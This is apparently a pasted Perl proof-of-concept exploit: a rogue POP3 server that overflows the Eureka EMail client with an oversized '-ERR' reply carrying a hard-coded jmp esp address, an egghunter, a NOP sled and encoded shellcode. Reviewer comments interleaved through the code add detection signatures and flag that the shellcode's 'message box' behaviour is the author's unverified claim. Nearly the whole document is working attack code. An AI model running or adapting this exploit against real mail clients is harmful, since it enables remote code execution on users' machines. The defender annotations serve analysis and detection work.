
Untitled

a guest Jun 22nd, 2017 101 Never
  1. use Socket;
  # Builds the reply body for a proof-of-concept malicious POP3 server. Per
  # the author's comments it targets the Eureka EMail client and overwrites
  # the saved return address (EIP) with an oversized "-ERR" line.
  # Defender notes: the finished reply is far longer than the 512 characters
  # RFC 1939 allows for a POP3 response, and it carries a long 0x90 run plus
  # the literal tag "w00tw00t" -- each is usable as a network or host signature.
  2. #fill out the local IP or hostname
  3. #which is used by Eureka EMail as POP3 server
  4. #note : must be exact match !
  5.  
  6. my $localserver = "10.0.1.6";
  7. #calculate offset to EIP
  # The filler shrinks by length($localserver), so filler + server name always
  # total 723 bytes. Presumably the client copies the configured server name
  # into the same buffer ahead of the reply text -- TODO confirm on the client.
  8. my $junk = "A" x (723 - length($localserver));
  # pack('V') emits the address as 4 little-endian bytes. A hard-coded address
  # only holds for the one user32.dll build the author used (not identified on
  # this page); ASLR or a different DLL version invalidates it, and DEP is
  # designed to block execution from the stack this jump lands on.
  9. my $ret = pack('V',0x7E47BCAF); #jmp esp from user32.dll
  # 300 bytes of 0x90 (NOP); in $payload it sits between the egghunter and
  # the tagged second stage.
  10. my $padding = "\x90" x 300;
  # First-stage "egghunter" stub with the 4-byte tag embedded in it. The same
  # tag appears twice in a row in front of $shellcode in $payload below.
  11. my $egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
  12. "w00t". #this is the marker/tag
  13. "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
  14.  
  15. # xsploited security msgbox! shellcode :D
  # NOTE(review): the comment above is the only description of this blob. The
  # bytes look encoded and were not decoded for this review, so "message box"
  # is the author's claim, not a verified property.
  16. my $shellcode = ("\x33\xc9\xba\x8d\x4c\x87\x06\xdb\xde\xd9\x74\x24\xf4\xb1\x45".
  17. "\x5f\x31\x57\x13\x03\x57\x13\x83\xef\xfc\xe2\x78\x95\x6c\x9d".
  18. "\x5b\x52\x57\x56\x6a\x49\x25\xe1\xbd\xa4\x2e\x85\xcc\x06\x24".
  19. "\xef\x22\xec\x4c\x0c\xb1\xb4\xb8\xa7\xbb\x18\x32\x81\x7b\x16".
  20. "\x5c\x9b\x88\xf1\x5d\xb2\x91\xe3\x3e\xbf\x01\xc0\x9a\x34\x9c".
  21. "\x34\x68\x1e\x36\x3d\x6f\x75\xcd\xf7\x77\x02\x8b\x27\x89\xff".
  22. "\xc8\x1c\xc0\x74\x3a\xd6\xd3\x64\x73\x17\xe2\xb8\x8f\x4b\x81".
  23. "\xf9\x1b\x93\x4b\x36\xee\x9a\x8c\x22\x04\xa7\x6e\x91\xcc\xad".
  24. "\x6f\x52\x56\x6a\x71\x8e\x00\xf9\x7d\x1b\x47\xa7\x61\x9a\xbc".
  25. "\xd3\x9e\x17\x43\x0c\x17\x63\x67\xd0\x49\xaf\xd5\xe0\xa0\xfb".
  26. "\x90\x14\x3b\xc1\xca\x58\x72\xc8\xe6\x37\x63\x4b\x09\x48\x8c".
  27. "\xfd\xb0\xb3\xc8\x80\xe2\x5e\x5d\xfa\x0e\xbb\xf0\xec\xa0\x3c".
  28. "\x0b\x13\x35\x87\xfc\x84\x29\x64\xdd\x15\xd9\x47\x2f\xb8\x7d".
  29. "\xc0\x3a\xb7\x18\x62\x4d\x6b\xc6\x88\xc4\x72\x50\x72\x83\x7e".
  30. "\xd5\x4e\x7c\xc4\x4d\xec\x30\x86\x0a\xed\xee\xa4\xfc\x6f\x10".
  31. "\xb7\x03\x07\xb6\x68\xdb\xf8\x2e\x0d\x68\x9c\xcd\xa5\xe1\x37".
  32. "\x66\x53\x95\xbf\xf5\xeb\x09\x71\x21\x83\x8d\x55\xd9\x1d\xce".
  33. "\xfe\x95\x64\x31\xa7\x3d\xf4\x44\x25\xd7\x92\xc2\xe9\x54\x06".
  34. "\x62\x85\xf3\xbc\x17\x31\x7c\x4e\xa7\xad\x4d\x79\xcf\x62\x8a".
  35. "\x6a\x46\x9b\xe3\x5e\x0a\x0f\x55\x0d\x55\x7f\x64\x71\xf9\x7f".
  36. "\xd2\x79");
  37.  
  # Wire layout, in order: filler, 4-byte return address, egghunter, NOP run,
  # doubled tag, second stage. The listener prepends "-ERR " and appends "\n".
  38. my $payload=$junk.$ret.$egghunter.$padding."w00tw00t".$shellcode;
  39.  
  40.  
  # Rogue POP3 listener: accepts a TCP connection and immediately writes
  # "-ERR <payload>" without sending a greeting or reading anything from the
  # client. Defender notes: a POP3 server whose first line is "-ERR" followed
  # by hundreds of bytes (many non-printable) is anomalous and worth alerting
  # on; restricting mail clients to known servers removes the exposure.
  41. #set up listener on port 110
  42. my $port=110;
  43. my $proto=getprotobyname('tcp');
  # NOTE(review): the return values of socket(), bind() and listen() are never
  # checked, so a failed bind (port in use, or no privilege for port 110) is
  # not reported before the "Listening" message is printed.
  44. socket(SERVER,PF_INET,SOCK_STREAM,$proto);
  # INADDR_ANY binds every local interface, not only $localserver.
  45. my $paddr=sockaddr_in($port,INADDR_ANY);
  46. bind(SERVER,$paddr);
  47. listen(SERVER,SOMAXCONN);
  # The port number in this message is a literal, independent of $port.
  48. print "[+] Listening on tcp port 110 [POP3]... \n";
  49. print "[+] Configure Eureka Mail Client to connect to this host\n";
  50. my $client_addr;
  51. while($client_addr=accept(CLIENT,SERVER))
  52. {
  53.   print "[+] Client connected, sending evil payload\n";
  # This inner loop has no exit condition: the same reply is written again and
  # again and control never returns to accept(). What happens once the client
  # disconnects (failed print or SIGPIPE) is not handled here.
  54.   while(1)
  55.   {
  56.      print CLIENT "-ERR ".$payload."\n";
  57.      print "    -> Sent ".length($payload)." bytes\n";
  58.   }
  59. }
  # Reached only when accept() returns false; after a client has connected the
  # inner loop above prevents execution from getting here.
  60. close CLIENT;
  61. print "[+] Connection closed\n";